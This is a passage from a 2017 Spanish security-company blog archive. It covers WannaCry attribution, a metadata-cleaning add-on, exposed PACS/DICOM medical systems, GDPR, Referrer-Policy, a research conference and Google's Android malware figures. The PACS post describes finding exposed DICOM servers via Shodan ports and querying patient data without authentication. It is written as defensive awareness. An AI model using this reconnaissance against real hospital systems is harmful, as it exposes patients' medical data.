que es UTC+9 (hora de Corea) . Sin embargo, con todo esto, sólo podemos hacer suposiciones El atacante comienza el ataque el día 9. Los días 10 y 12 se dedica casi por completo a crear Wannacry. Por alguna razón, tarda más tiempo en editar el fichero de lengua china. Su idioma por defecto en Word es Coreano. Por las horas de ataque, su huso horario podría ser de UTC+2 a UTC+12. Innovación y laboratorio www.elevenpaths.com
13 de junio de 2017
El día D – Desembarco Metashield 365 visible en equipos Mac
Sabíamos que los usuarios de Mac no estaban solos contra los metadatos, pero si sabíamos que no disponían de las mismas armas para poder tratarlos cuando esto se requiere en comparación con los sistemas Windows. Para los que no están familiarizados, la Sociedad Española de Documentación e Información Científica (SEDIC), define el metadato como “toda aquella información descriptiva sobre el contexto, calidad, condición o características de un recurso u objeto de información que tiene la finalidad de facilitar su recuperación, autentificación, evaluación, preservación y/o interoperabilidad”. A priori esta información está normalmente oculta y no suele ser accesible completamente por métodos manuales, pero si mediante herramientas específicas de extracción de metadatos. Por estas razones la información extraída de los metadatos podría ser utilizada por atacantes para aprender más acerca de sus objetivos y para llevar a cabo actividades maliciosas como un ataque de ingeniería social (por ejemplo, ransomware o spear-phishing), ya que los metadatos podrían proporcionar información útil sobre los empleados y la infraestructura de TI de la empresa. Conocer el software y las versiones en uso dentro de la organización (gracias a la información revelada e n los metadatos) puede determinar qué exploits podrían tener éxito en un ataque de este estilo. En un mundo que cada vez tiende más al entorno cloud, Microsoft Office 365 se está convirtiendo en una de las piezas fundamentales de las empresas sustituyendo paulatinamente las anteriores suites de productos ofimáticos Microsoft y compitiendo duramente con su gran oponente del mercado, Google. Aquí es donde apareció Metashield for Outlook 365, una sencilla herramienta orientada a empresas y bajo suscripción anual, única para entornos de correo Outlook 365 que permite el tratamiento de metadatos de los documentos adjuntos en los correos de salida. Cualquier usuario que acceda a su cuenta online 365 podrá hacer uso de este complemento para eliminar la información sensible en forma de metadatos que contienen los archivos adjuntos en los correos de salida, información oculta o datos perdidos. No importa el dispositivo, solo que puedas acceder a tu cuenta, lo apliques y listo. Pero muchos usuarios trabajan habitualmente desde el entorno Outlook local y disponer de este complemento Metashield en nuestro menú de Outlook era algo que solo los privilegiados de Windows podían disfrutar. El resto como los usuarios de Mac debían acceder a la cuenta de correo online para poder eliminar los metadatos. En fin, seguíamos siendo diferentes. Bueno, pues la espera ha terminado. Ahora ya es posible poder encontrar el complemento Metashield también en el Menú de Outlook local de los equipos Mac con cuenta Office 365, lo cual mejora notablemente la experiencia de usuario. De cara a los usuarios de Outlook 365, independientemente de su S.O, la disponibilidad de este complemento se ha caracterizado principalmente por su distribución rápida y silenciosa por los buzones de la organización, evitando la intervención del usuario en su instalación o configuración lo cual siempre facilita las cosas. Las herramientas y servicios contra la fuga de información colaboran con las políticas de las organizaciones cada vez más conscientes en temas de seguridad, pero hemos de recordar que la primera de todas las herramientas de seguridad es el propio usuario, que debe conocer, y participar de los mecanismos y tecnologías disponibles a su alcance, garantizando un escenario de trabajo más seguro y estable dentro de la organización. Metashield for Outlook 365 es una pieza clave en entornos de correo Outlook online, fortaleciendo nuestro compromiso por la seguridad, aportando un grado de confianza y seguridad superior, que viene para formar parte de nuestra filosofía de vida. A continuación, os presentamos un video desde el punto de vista del usuario: Antonio Bordón Villar Cyber Security Product Manager antonio.bordon@11paths.com
6 de junio de 2017
PACS y DICOM: Una “radiografía” a las debilidades y fugas de información en sistemas médicos
En el mundo de la conectividad de los dispositivos médicos y su instrumentación, existen una amplia variedad de iniciativas, protocolos, estándares y fabricantes que trabajan arduamente en intentar alcanzar una integración neutral para este tipo de sistemas y dispositivos. Imagen 1: Ejemplo de sistema médico Claro está que aquellos que trabajamos en la comunidad de la seguridad, vemos con gran preocupación que el auge que siguen tomado estas tecnologías no implique considerar desde el diseño, conceptos como el desarrollo seguro. Dentro de la gran variedad de sistemas, en esta oportunidad queremos enfocarnos en los sistemas PACS (Picture Archiving and Communication System), cuya arquitectura típica podemos observar en la imagen 2. En dicha imagen podemos observar que existe un componente principal llamado servidor PACS, el cuál es un sistema encargado del almacenamiento digital, de la transmisión y de la descarga de imágenes radiológicas. Estos sistemas se componen de software y hardware, que se comunican directamente con las denominadas modalidades (“Modality”); y es a través de estas, que se obtienen las imágenes. Las imágenes son transferidas hacia el visor PACS (software cliente para visualización y emisión de informes radiológicos), las cuales pueden ser tanto estaciones de trabajo o dispositivos móviles (con sus respectivas vulnerabilidades por mala gestión de los mismos). Imagen 2: Ejemplo de arquitectura típica PACS Dentro de este tipo de arquitecturas, el protocolo DICOM (Digital Imaging and Communications in Medicine) juega un papel relevante ya que es el llamado formato universal para el intercambio de imágenes médicas digitales. El mismo es responsable de toda la comunicación con las modalidades del área de imágenes (cada una de las técnicas/equipos para la obtención de imágenes: Tac, Resonancia Magnética, Ecografía). Además de la comunicación con otros servidores PACS y estaciones de trabajo DICOM. Las inadecuadas prácticas de desarrollo, configuración o implementación, como en cualquier ámbito, provocan fallos de seguridad muy variados, pero en este caso nos preocupan aquellos donde principalmente podría revelarse información como los datos personales de los pacientes, tipo de enfermedades, hospitales visitados e información de sus doctores, entre otros… Imagen 3: DCOM Haciendo unas simples búsquedas en Shodan por los puertos 104 o 11112 de DICOM más comunes o directamente alguna palabra clave como se muestra a continuación, es posible tener una idea de qué tan expuestos se encuentran estos sistemas: Imagen 4: Búsqueda en Shodan Server de DCOM, top de búsquedas. Imagen 5: Búsquedas en Shodan Server de DCOM, Argentina. Imagen 6: Búsqueda en SHodan Serber de DCOM, Ecuador. Imagen 7: Búsqueda en Shodan Server de DCOM, Chile. Encontrar sistemas expuestos podría no representar un problema para muchos, pero innegablemente existe un riesgo de seguridad sobre el cual deberíamos preocuparnos, porque existen vulnerabilidades provocadas por las malas implementaciones que evidencian fugas de información tales como la que podemos ver en las siguientes imágenes, donde haciendo uso de un Viewer PACS (en este caso utilizamos el de RADIANT) es posible consultar remotamente (sin autenticación) información de pacientes, exámenes radiológicos (información o imágenes), incluso con la posibilidad de estar expuestos a la manipulación de esta información a través de algún otro fallo. Imagen 8: Información accedida con el Viewer PAC de un sistema expuesto. Claramente, este tipo de servicios podrían estar expuestos a la explotación de algún otro tipo de vulnerabilidad critica o de mayor impacto, permitiendo, por ejemplo, tomar control de una red hospitalaria. Existen varios posibles vectores de ataque que un potencial atacante podría aprovechar, como por ejemplo: Passwords Hardcodeados (ejemplo: CVE-2013-7442 GE Centricity PACS) Trafico inseguro Firmware de dispositivos (Modality) APIs de PACS (RESTFul) Fallos en el desarrollo de Software Clientes Viewer PACS (Escritorio, Web, Apps) Aplicación Web de GE para Radiología (acceso a reportes e imágenes desde PACS) Tenemos que tomar en consideración que no solo existen este tipo de dispositivos o sistemas de salud, son muchos más, y de no tomar en cuenta las consideraciones necesarias de seguridad, se podrían presentar los mismos riesgos a los cuales se enfrentan en la actualidad cualquier infraestructura tecnológica. Si desean conocer un poco más, no dejen de analizar la información disponible en: OFFIS (Institute for Information Technology) – DICOM Toolkits, Librerías, Software, Demos Sitio que ejecuta un servidor DICOM genérico para uso público de pruebas Seguiremos pendiente de cómo evolucionan tanto los dispositivos como los sistemas médicos para traerles nuevas entradas acerca de ellos. De igual manera los invitamos a compartir información acerca de estos sistemas en nuestra comunidad. Carlos Ávila Chief Security Ambassador @badboy_nt carlos.avila@global.11paths.com
30 de mayo de 2017
Ya solo queda un año para la aplicación del nuevo reglamento europeo de protección de datos. ¿Estás preparado?
El nuevo Reglamento Europeo de Protección de Datos (RGPD), el cambio más importante en la regulación de la privacidad en los últimos veinte años, entró en vigor en mayo del año pasado, y será de obligado cumplimiento en toda la UE a partir del 25 de mayo de 2018. Hasta esta fecha, permanece vigente la Ley Orgánica de Protección de Datos (LOPD). Un año puede parecer mucho tiempo, pero puesto que el proceso de adecuación es complejo, no conviene esperar al último momento, más sabiendo el riesgo de recibir una multa por parte del regulador. ¿Sabes cómo el RGPD afecta a la seguridad de la información de tu empresa? El nuevo reglamento tiene como objetivo garantizar el derecho a la protección de datos de los ciudadanos europeos, independientemente de la localización del responsable del tratamiento. Es decir, todas las empresas que traten datos personales de ciudadanos europeos deberán cumplir el nuevo RGPD, aunque no estén establecidas en territorio europeo –como por ejemplo ocurre con muchos servicios que se prestan a través de Internet. El nuevo RGPD refuerza los principios garantistas de la protección de datos, introduciendo cambios en el modo de recabar el consentimiento para permitir el tratamiento de los datos personales, puesto que deja de ser válido el consentimiento tácito, y también reconoce nuevos derechos básicos de los ciudadanos, como la portabilidad de la información personal y el derecho al olvido. Otra novedad significativa es la aparición de la figura del DPO ( Data Protection Officer o Delegado de Protección de Datos), que será obligatorio cuando se realicen tratamientos de datos personales a gran escala o de información sensible, quien velará por la correcta aplicación de la normativa de protección de datos en la organización. La novedad que afecta más directamente al ámbito de la seguridad consiste en la introducción del principio de protección de datos desde el diseño y por defecto. En la regulación actual ya se especifican unas medidas de seguridad concretas, pero estas son susceptibles de quedar obsoletas. Por esta razón, RGPD introduce una serie de principios de actuación, que se refieren a las medidas técnicas y organizativas apropiadas que garanticen un nivel de seguridad adecuado al riesgo. Estas medidas deben contemplar en cada momento el estado de la técnica, los costes de aplicación, y la naturaleza, alcance, contexto y fines del tratamiento, así como la gestión del riesgo de una filtración de datos, en concreto la probabilidad y gravedad del daño que podría causar en los derechos y libertades de las personas físicas. Así, cuando sea probable que un tipo de tratamiento entrañe un alto riesgo para los derechos y libertades de las personas físicas, será necesario realizar previamente una evaluación del impacto y en caso de que esta evaluación apunte un alto grado de riesgo, será necesario o bien modificarlo, hasta que el análisis sea satisfactorio, o realizar una consulta previa a la autoridad de control (en España a la AEPD). Estas medidas de seguridad se condensan en la necesidad de un balance entre prevención y reacción. No es suficiente con reaccionar cuando se produzca un incidente, puesto que habitualmente el daño ya es imposible de reparar, sino que es preciso un enfoque proactivo y preventivo. Si a pesar de las medidas preventivas no es posible impedir que se produzca la brecha, es necesario detectar el incidente y notificarlo a la autoridad de control sin dilación, en un plazo máximo de 72 horas, así como a los propios interesados cuando entrañe un alto riesgo para sus derechos y libertades. Además de todas lo anterior, la autoridad requerirá demostrar el cumplimiento de la normativa de protección de datos mediante evidencias fehacientes. Por lo tanto, será necesario tener identificadas y documentadas las medidas técnicas y organizativas adoptadas para mitigar el riesgo, la monitorización continua de estas y su eficacia. Por último, cabe destacar, que las sanciones previstas en el nuevo RGPD son muy elevadas (con multas administrativas de veinte millones de euros como máximo o, tratándose de una empresa, de una cuantía equivalente al 4 % como máximo del volumen de negocio total anual global del ejercicio financiero anterior, optándose por la de mayor cuantía), lo cual sumado al daño en la reputación de marca, una fuga de datos puede suponer una verdadera fatalidad. La entrada en vigor de esta nueva regulación es una oportunidad para revisar y adecuar las políticas de tratamiento de datos personales, y así ofrecer las mayores garantías de protección, lo que a la postre redunda en la confianza de los ciudadanos europeos en el uso de los servicios digitales. ¿Cómo adaptarse a la nueva normativa de Protección de Datos? Desde nuestro punto de vista, la ciberseguridad, y en concreto la protección de datos, debe regirse mediante un modelo que combine tecnología, procesos y personas y, como la misma regulación indica, es necesario incorporar al núcleo del negocio la seguridad y privacidad por defecto desde el diseño e involucrar a todos los departamentos desde los primeros estadios, en particular a la dirección. Tras un proceso de detallado análisis de la normativa y el estado actual de la protección de datos, hemos diseñado una solución específica, que combina en su justa medida los servicios y productos de ElevenPaths – SandaS GRC, SandaS, Data Management, CyberThreats y otros–, los de los más relevantes proveedores de seguridad, y los mejores expertos en seguridad y protección de datos, para ayudarte en la adecuación al RGPD, de una manera personalizada, escalable y continuada en el tiempo. Raquel Santos Beneit Jefe de producto de Data Management @rsanben raquel.santosbeneit@telefonica.com Juan Antonio Gil Belles Jefe de producto en Riesgo y Cumplimiento @breggovic juanantonio.gil@11paths.com Francisco Oteiza Lacalle Jefe de producto en Seguridad Gestionada @Fran_Oteiza francisco.oteizalacalle@telefonica.com
25 de mayo de 2017
Big Data for Social Good in Action 2017
El próximo 18 de Mayo, a las 19.00 en Wayra, en la sede de Telefónica en Gran Vía, se celebra el evento Big Data for Social Good en Telefónica con el objetivo de reunir a todas aquellas personas que quieran transformar el Big Data for Social Good de "storytelling" a "storydoing". Queremos construir una comunidad con partnerships y colaboradores que permitan que, juntos, podamos llegar a los objetivos de desarrollo sostenible, sacando el máximo jugo al Big Data, Data Science, Inteligencia Artificial y Machine Learning. El Big Data y la Inteligencia Artificial jugarán un papel crucial en la evaluación de nuestro progreso en los Objetivos de Desarrollo Sostenible de Naciones Unidas utilizando datos de pago para medir el impacto económico de los terremotos, sirviéndose de imágenes satélite para señalar zonas de riesgo de inundación, identificando preguntas en motores de búsqueda para monitorear la propagación del dengue o incluso usando datos móviles para analizar el nivel de analfabetismo en zonas de difícil acceso. Las posibilidades son infinitas. La agenda del evento es la siguiente: Figura 1: Agenda de Big Data for Social Good Durante los últimos años se ha hablado mucho sobre cómo puede la tecnología del Big Data ayudar a optimizar nuestras organizaciones, maximizar los beneficios y acercarnos a los consumidores. Sin embargo, los datos también pueden usarse para desarrollar una faceta social, utilizando esta ingente cantidad de información para cambiar nuestra sociedad. Esto es lo que llamamos Big Data for Social Good. ¡Te esperamos!
17 de mayo de 2017
Politica Referrer
Hoy en día es muy común moverse entre webs por medio de enlaces, muchos blogs lo utilizan para guiar a sus usuarios de noticia a noticia. Cuando entramos a una web esta puede conocer cuál es tu web de origen, esto es gracias una variable de las cabeceras que se envía tanto al cliente como al servidor llamada “referrer”, esta variable la podemos encontrar en los protocolos http y https. Hasta hace unos meses la cabecera de http referrer funcionaba del siguiente modo; al pasar de unan página http a otra del mismo tipo u otra con protocolo https se incluía el referrer en la cabecera, al pasar de una página https a otra del mismo tipo el funcionamiento era el mismo, sin embargo, al pasar de una página https a una con http el referrer no se incluía. Recientemente esto ha cambiado con la llegada de 7 nuevas políticas que permiten decidir a qué páginas les enviamos dicha información sobre nuestro origen. Tras investigar un poco el funcionamiento de estas nuevas políticas podemos afirmar que hay algunas más seguras que otras si queremos mantener a salvo nuestra privacidad. Origin: Con esta política siempre que pasemos de una página a otra por medio de un link nuestro navegador incluirá nuestro origen en la solicitud a la página. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.example.com Origin-when-cross-origin: Con esta política se envía la URL de la página de origen, sin embargo la que se envía es la URL de la página principal, a no ser que se pase de una página https a la misma página https, que en ese caso se incluye la URL completa de la página de origen y no la URL de la página principal. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.example.com http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.example.com http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.elladodelmal.com Unsafe-URL: con esta política independientemente del protocolo de origen y el de destino al pasar de una página a otra siempre se incluirá en el header la URL completa de la página de la que venimos. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.example.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.example.com https://www.elladodelmal.com/1 Estas tres políticas son las menos seguras, ya que estamos dejando un rastro de nuestro recorrido por internet. Comúnmente las páginas utilizan estos datos para hacer estadísticas en las que se refleja de donde vienen sus visitas. Same-origin: En esta política el navegador solo incluirá el referrer header para peticiones de la misma página de origen y solo si esta mantiene el protocolo https, si se pasa a otra página independientemente de su protocolo no incluirá la cabecera referrer en la petición. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.example.com No https://www.elladodelmal.com/1 https://www.example.com No Strict-origin: Esta es parecida a la política origin, lo que la diferencia de la origin es que al pasar de una página segura con https a una con http independientemente de cual sea la página no se revelará el origen. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.example.com No https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 http://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.example.com http://www.elladodelmal.com Strict-origin-when-cross-origin: esta es similar a origin-when-cross-origin, en esta política solo se compartirá nuestro origen mientras naveguemos de una página https a otra del mismo tipo, si pasamos de https a http no se incluirá nuestro origen. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 https://www.elladodelmal.com/1 https://www.elladodelmal.com/1 https://www.example.com https://www.elladodelmal.com https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.example.com No Por ultimo tenemos la política no-referrer: esta es la política más segura de todas ya que independientemente del tipo de páginas por las que nos movamos nunca se enviará la cabecera referrer incluso moviéndonos dentro de la misma página. Origen Destino Referrer https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.elladodelmal.com/2 No https://www.elladodelmal.com/1 https://www.example.com No https://www.elladodelmal.com/1 https://www.example.com No https://www.elladodelmal.com/1 https://www.example.com No Todas estas políticas ya han sido incluidas en muchas páginas web, y se ha realizado un estudio sobre que navegadores y que versiones de los mismos soportan la nueva cabecera, aquí tenéis una tabla en la que podréis comprobar si vuestro navegador habitual ya ha adoptado las nuevas políticas de la cabecera Referrer. Para comprobar si las páginas que visitáis habitualmente ya disponen de la cabecera Referrer podéis introducir su URL en securityheaders.io. Esta página además de comprobar las cabeceras que hay activas en un dominio te explica detalladamente cuales son las políticas que están desactivadas y si estas implican algún riesgo de seguridad.
16 de mayo de 2017
ElevenPaths participa en JNIC 2017 y sus retos científicos, impulsando la investigación de ciberseguridad
Del 31 de mayo al 2 de junio tendrá lugar la tercera edición de las Jornadas Nacionales de Investigación en Ciberseguridad (JNIC). Esta edición ha sido organizada por la Universidad Rey Juan Carlos en colaboración con el Instituto Nacional de Ciberseguridad (INCIBE), que como actor fundamental en el ámbito de la Ciberseguridad, coordina actuaciones y esfuerzos con el resto de organismos públicos y privados, nacionales e internacionales, que trabajan en esta materia. La edición de este año tendrá lugar en la sede de Madrid-Quintana (Calle Quintana 21) de la Universidad Rey Juan Carlos y al igual que en las ediciones pasadas, pretende ser un punto de encuentro para investigadores y profesionales de la Ciberseguridad en el ámbito nacional. Se trata de un foro privilegiado en el que exponer, conocer y premiar los últimos avances en I+D, establecer nuevas colaboraciones y realizar contactos. En definitiva, las Jornadas permiten que los distintos agentes del ecosistema participen en función de sus experiencias y conocimiento con el fin de potenciar la investigación, la innovación docente y la transferencia tecnológica en el ámbito de la Ciberseguridad a nivel nacional. ElevenPaths tendrá doble presencia en esta edición, por un lado, seguimos apostando por la contribución científica, donde nuestro experto José Torres participa como ponente en la primera sesión de Criptografía, privacidad y anonimato. En su charla, se mostrarán los resultados de la última investigación sobre los mecanismos de seguridad HSTS y HPKP desarrollada en el área de innovación y laboratorio. Por otro lado, ElevenPaths se involucra de manera activa en el Track de Transferencia, arrancando este prometedor programa de investigación definido a través de retos científicos. Esta iniciativa promovida por el INCIBE, tiene como objetivo trasladar necesidades reales de usuarios finales y organismos privados a los equipos de investigación, permitiendo la resolución de estos problemas de ciberseguridad a través de las capacidades científicas y tecnológicas de los investigadores. Esta fórmula de cooperación entre sector privado y académico permitirá a los retadores obtener soluciones de indudable nivel científico, mientras que los investigadores podrán canalizar sus esfuerzos para abordar necesidades industriales concretas, reales y demandadas. Para impulsar esta iniciativa, ElevenPaths formará parte del comité de supervisión del Track, junto a distinguidos representantes de la comunidad científica española como son Antonio Maña de la Universidad de Málaga, Juan Caballero de IMDEA Software, Rafael Estepa de la Universidad de Sevilla y Víctor Villagrá de la Universidad Politécnica de Madrid. Además ofreceremos una serie de retos de ciberseguridad de acuerdo a ciertas necesidades detectadas por nuestros expertos del área de innovación y laboratorio. La conferencia tendrá lugar el día 31 de mayo a las 10:00 horas y ya está disponible el programa completo. Será una buena oportunidad para conocer de primera mano el trabajo que se desarrolla en ElevenPaths y especialmente en el área de innovación y laboratorio. Donde además podréis obtener más información de los retos de ciberseguridad que ofertaremos dentro del Track de Transferencia. Innovación y laboratorio www.elevenpaths.com
15 de mayo de 2017
Ponemos bajo lupa el informe anual de seguridad en Android de Google
El mes pasado, Google publicó su tercer informe anual de seguridad sobre las protecciones de seguridad de Android, con el objetivo de enviar un mensaje claro al mundo sobre el malware móvil (o PHA, Potencially Harmful Applications, como prefieren denominarlo): dispositivos, aplicaciones y usuarios de Android están más protegidos que nunca. Y todo el ecosistema de Android es ahora más seguro. Transmitir mensajes positivos está bien, pero es importante ser realista. Eso es lo que nos hace mejorar. Hemos retorcido algunas de las cifras y datos incluidos en el informe, y finalmente hemos llegado a la conclusión de que es difícil pensar que el ecosistema Android es en realidad tan seguro como Google afirma, especialmente teniendo en cuenta que la terminología empleada no es clara y en algunos casos los números no cuadran. Al final es una cuestión de qué entendemos por “malware” Según el informe, el termino PHA corresponde a "aplicaciones que podrían poner en riesgo a usuarios, datos de usuario o dispositivos". Esto incluye entre muchos otros, troyanos, spyware o apps de phishing. Eso está bien, pero, como reconoció Google, "también somos menos estrictos en nuestra definición de ciertos PHAs respecto a lo que algunos usuarios esperarían. Un ejemplo clásico es el spam publicitario, que definimos como una aplicación que presenta publicidad al usuario de una manera inesperada, por ejemplo en la pantalla de inicio del dispositivo o en la pantalla de bloqueo". Esto quiere decir que Google no tiene en cuenta el adware agresivo, uno de los problemas más comunes para el usuario final de Google Play, como PHA. No encontramos indicios de una definición agresiva de adware incluida dentro de la clasificación del equipo de seguridad de Google Android para aplicaciones potencialmente perjudiciales (PHA). ¿Cuán agresivo puede llegar a ser este “spam publicitario” o adware? No lo sabemos. Algunas de las “denominadas” campañas publicitarias terminaron rooteando el dispositivo y no sabemos si son considerados PHA. Esto lógicamente deriva en un descenso de las cifras, y seguramente represente uno de los principales gaps con los que las empresas de Antivirus y el propio Google juegan. Otro aspecto interesante sobre la definición de PHA es que Google ha eliminado un subconjunto del malware que podría ser considerado como "spyware" dentro de esta categoría. Desde 2016, Google introdujo el concepto de MUwS (Mobile Unwanted Sofware): " Un ejemplo común de comportamiento MUwS corresponde a la recolección agresiva de identificadores de dispositivos u otros metadatos. Anteriormente, estas aplicaciones estaban incluidas dentro de la categoría PHA, pero para mejorar la claridad de nuestras clasificaciones ahora es categorizada como MUwS". "Definimos MUwS como aplicaciones que recogen al menos una de los siguientes atributos sin el consentimiento del usuario: Información sobre las aplicaciones instaladas; Información sobre cuentas de terceros; Nombres de archivos en el dispositivo”. El spyware aún está presente como una categoría en sí misma, pero únicamente si recoge información "sensible" que no entra dentro de los MUwS. Ahora tenemos que lidiar con dos taxonomías de Google para clasificar aplicaciones: PHA y MUwS, que representan software potencialmente dañino y no deseado. La pregunta es entonces, ¿cuántos dispositivos tienen PHA y MUWS instalados? Esta es la tasa de infección incluyendo PHA y MUwS. Resulta interesante destacar que Google no cuenta como dispositivos infectados aquellos donde el propio usuario ha decidido rootear el teléfono (algo muy común en algunos países). En algún momento del 2016, parece que cambiaron la forma en que los dispositivos únicos son contabilizados. Justo antes de que la tasa de infección se volviera más alta. No sabemos cómo afectó esta nueva metodología en los números reportados. Además, Google dedicó parte de su informe a comentar el caso del Turkish Clicker, una pieza de malware bastante relevante que hemos seguido desde 2015, y confirmada por el equipo de investigación de CheckPoint. Aunque la familia perteneciente al malware Turkish Clicker ha estado presente en Google Play durante mucho tiempo, y con varias campañas activas desde 2014, no es considerado como PHA por Google: " Por sí mismo, este comportamiento de fraude vía clics no es PHA: hacer clic sobre enlaces HTTP no viola ninguno de los límites de seguridad de Android ni pone en riesgo los datos de los usuarios. Esta familia ha sido clasificada como downloader hostil porque, en algunos casos, los anuncios descargaron de forma involuntaria otros PHA al dispositivo del usuario". ¿Significa esto que las descargas e instalaciones del Turkish Clicker en Google Play no están incluidas en las "estadísticas de PHA"? Esto resulta un poco desconcertante. Cuando hablan específicamente sobre este ejemplo, ni siquiera representan sobre el eje Y del gráfico el número de instalaciones asociadas a cada término (Google Play y Outside of Google Play). Google declaró en su informe que actualmente Android representa más de 1.400 millones de dispositivos. Los principales titulares afirman que a finales de 2016, menos del 0,71% de los dispositivos tenían un PHA instalado. En otras palabras, dispositivos infectados. Esto disminuye al 0,05% para dispositivos que descargan exclusivamente aplicaciones desde Google Play. Ese mensaje podría significar que el malware no es un problema real para los usuarios... pero, ¿es así realmente? Algunos proveedores afirmaron que las tasas de infección reales corresponden al doble, esto es, más del 1,4%. Una gran herramienta antimalware integrada dentro del sistema Android es Verify Apps. Este motor antivirus comprueba las aplicaciones cada, al menos, 6 días. Verify Apps bloquea automáticamente los intentos de instalación iniciados por una PHA instalada desde septiembre de 2016. En 2016, únicamente el 0,02% de las instalaciones descargadas desde Google Play fueron identificadas como falsos negativos. Esto quiere decir que "no fueron detectadas por Google con sus sistemas antimalware". Respecto a instalaciones fuera de Google Play, los números son mayores: La tasa de falsos negativos promedio es del 2,6% en los primeros 90 días. 0,02% no es una mala tasa de falsos negativos, pero debemos tener en cuenta que tienen la capacidad de no permitir la entrada de ciertas aplicaciones en Google Play. Parece que, con algunas excepciones, la salud general de Google Play ha aumentado año tras año. Sin embargo, en el mismo informe, afirmaron que las aplicaciones de fraude vía SMS habían aumentado un 282% y el fraude “de peaje” (toll fraud) en un 592% durante 2016. Lo que significa, respectivamente, 5 y 2 veces más fraude de SMS y aplicaciones de fraude de peaje en el market oficial. El fraude de peaje corresponde a cualquier otro medio (diferente de los SMS o llamadas premium) a través del cual un atacante podría estafar al usuario (tráfico WAP, etc.). HummingBad: las cifras no cuadran HummingBad y todas sus derivadas representan un caso especial. HummingBad corresponde a un malware extremadamente sofisticado y bien desarrollado, sin duda uno de los mayores problemas para los usuarios de Android durante 2016. Descubierto por CheckPoint en los dispositivos de sus clientes en febrero de 2016, HummingBad representa un malware verdaderamente agresivo que consiguió eludir los controles de seguridad de Google Play, infectando millones de dispositivos (10 millones de víctimas, rooteando miles de dispositivos cada día y generando 300,000 dólares mensuales). CheckPoint ha seguido esta amenaza durante mucho tiempo, por lo que pueden presumir de disponer de estadísticas e informes de primera mano sobre este malware. CheckPoint consiguió incluso acceder al C&C (Command & Control), lo que les permitió conocer de cerca cuan agresiva fue esta campaña. En el siguiente gráfico, se puede observar cómo las instancias de HummingBad (dispositivos únicos infectados) ascienden durante el mes de mayo de 2016 para posteriormente disminuir hasta su desaparición final. La figura de abajo muestra una imagen del panel de control de Umeng (empresa de publicidad) obtenida por CheckPoint, que muestra como los usuarios (y los beneficios asociados) crecen también de 2015 a mayo de 2016. Cheetah Mobile también mostró cómo las infecciones relacionadas con HummingBad descendieron en mayo. El informe anual de seguridad de Google para Android indica que HummimgBad tuvo acceso a los dispositivos de una manera diferente. Como se muestra a continuación, afirman que HummingBad alcanzó su máximo entre febrero y mayo de 2016, y posteriormente sus instalaciones se redujeron muy rápidamente, incluso más rápido de lo que Cheetah Mobile o CheckPoint parecen reflejar (no se incluye detalle del eje Y dentro del gráfico de Google, por lo que no podemos establecer su magnitud y ritmo de decrecimiento). El informe de HummingBad generado por CheckPoint fue liberado en julio. Tal vez esto ayudó a "limpiar" los dispositivos, pero esta parte no está clara. Quizás Google no este incluyendo las consecuencias directas de HummingBad (más malware / PHA / instalaciones de HummingBad) como infecciones contabilizables. Además, Google afirma: "De las 24.000 aplicaciones de HummingBad con unos 379 millones de intentos de instalación (25.1% de los cuales fueron bloqueados o señalados por VerifyApps), únicamente una aplicación fue subida con éxito a Google Play, y ésta fue retirada antes de que llegara a las 50 descargas". Esto es cierto, ya que HummingBad no entró en Google Play la primera vez. Sin embargo, lo hizo la segunda vez que regresó públicamente, al menos en diciembre de 2016, cuando fue identificado por CheckPoint como una nueva variante del malware de HummingBad, denominado "HummingWhale", oculto en más de 20 aplicaciones en Google Play. Este regreso en diciembre no se refleja en las estadísticas.... Usuarios desprevenidos descargaron las aplicaciones infectadas en esta campaña varios millones de veces, pero, según el gráfico, las infecciones en diciembre dentro de Google Play ni siquiera se reflejan (el gráfico termina en noviembre). Pero, al margen de esta confusión de datos, Google mostró además la siguiente tabla, donde declaraban que habían bloqueado el 99,96% de los "intentos de instalación". Estos datos abarcan el periodo desde abril de 2016 hasta diciembre de 2016. Por lo tanto, los datos mostrados por el informe no incluyen el intervalo de tiempo entre enero y marzo, precisamente cuando la tasa de infección fue mayor. Figura: ¿Cuales son exactamente las conclusiones que debemos extraer de estos gráficos? ¿Cuál es el porcentaje de PHA, MUwS o PHA+MUwS realmente instaladas? Conclusiones De acuerdo a todo lo anterior, resulta difícil pensar que el ecosistema de Android es realmente tan seguro como Google afirma, especialmente teniendo en cuenta que la terminología utilizada en el informe no es clara y algunas cifras no resultan coherentes. Google ha mejorado la seguridad de Android, y sortear sus controles de seguridad no es sencillo en absoluto. Sin embargo, es importante recordar que la mayoría del malware en Android no requiere necesariamente la elusión de los sistemas de seguridad para controlar o dañar el sistema. El usuario (el eslabón más débil de la cadena de seguridad) es precisamente el que instala el malware y le otorga altos permisos. Este informe declaraba que " un usuario tiene diez veces más probabilidades de descargar una PHA desde fuera de Google Play en 2016". Esto significa que Google Play es más seguro que los markets no oficiales, pero todavía queda mucho trabajo por hacer para proteger activamente a los usuarios de aplicaciones 